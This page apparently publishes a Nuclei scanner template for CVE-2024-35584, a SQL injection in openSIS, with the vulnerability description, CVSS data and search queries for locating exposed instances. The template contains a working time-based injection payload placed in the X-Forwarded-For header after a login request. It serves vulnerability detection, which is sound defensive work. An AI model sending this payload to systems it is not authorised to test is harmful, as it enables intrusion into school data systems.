Skip to content

openSIS < 9.1 - SQL Injection

ID: CVE-2024-35584

Severity: high

Author: s4e-io

Tags: cve,cve2024,opensis,authenticated,sqli

SQL injection vulnerability in Ajax.php, ForWindow.php, ForExport.php, Modules.php, functions/HackingLogFnc.php in OpenSis Community Edition 9.1, 8.0, and possibly earlier versions. It is possible for an authenticated user to perform SQL Injection due to the lack to sanitisation. The application takes arbitrary value from “X-Forwarded-For” header and appends it to a SQL INSERT statement directly, leading to SQL Injection.

id: CVE-2024-35584
info:
name: openSIS < 9.1 - SQL Injection
author: s4e-io
severity: high
description: |
SQL injection vulnerability in Ajax.php, ForWindow.php, ForExport.php, Modules.php, functions/HackingLogFnc.php in OpenSis Community Edition 9.1, 8.0, and possibly earlier versions. It is possible for an authenticated user to perform SQL Injection due to the lack to sanitisation. The application takes arbitrary value from "X-Forwarded-For" header and appends it to a SQL INSERT statement directly, leading to SQL Injection.
reference:
- https://www.tenable.com/cve/CVE-2024-35584
- https://vuldb.com/?id.280406
- https://github.com/whwhwh96/CVE-2024-35584
- https://github.com/OS4ED/openSIS-Classic
- http://opensis.com
- https://nvd.nist.gov/vuln/detail/CVE-2024-35584
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
cvss-score: 8.8
cve-id: CVE-2024-35584
cwe-id: CWE-89
metadata:
max-request: 2
vendor: os4ed
product: opensis
shodan-query: http.title:"opensis"
fofa-query: title="opensis"
google-query: intitle:"opensis"
tags: cve,cve2024,opensis,authenticated,sqli
http:
- raw:
- |
POST /index.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
USERNAME={{username}}&PASSWORD={{password}}&language=en&log=
- |
@timeout 20s
GET /Ajax.php?modname=tools/notallowed.php HTTP/1.1
Host: {{Hostname}}
X-Forwarded-For: 122.122.122.122' AND SLEEP(7) AND '1'='1
matchers:
- type: dsl
dsl:
- duration_2>=7
- contains(body_1, "openSIS") && contains_all(body_2, "donetext:", "\'Done\'")
- status_code_1 == 200 && status_code_2 == 200
condition: and
# digest: 4a0a00473045022100a31ee252b933470918bc0c168d165b09d400844a6c491df401b859518d82d1c502204b617f5897c3a1e98bf8dbf34e9f7ba18ab06bda618e5f481513fa66a736b3c5:922c64590222798bb761d5b6d8e72950

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

Terminal window
$ nuclei -u "URL" -t "http/cves/2024/CVE-2024-35584.yaml"

View on Github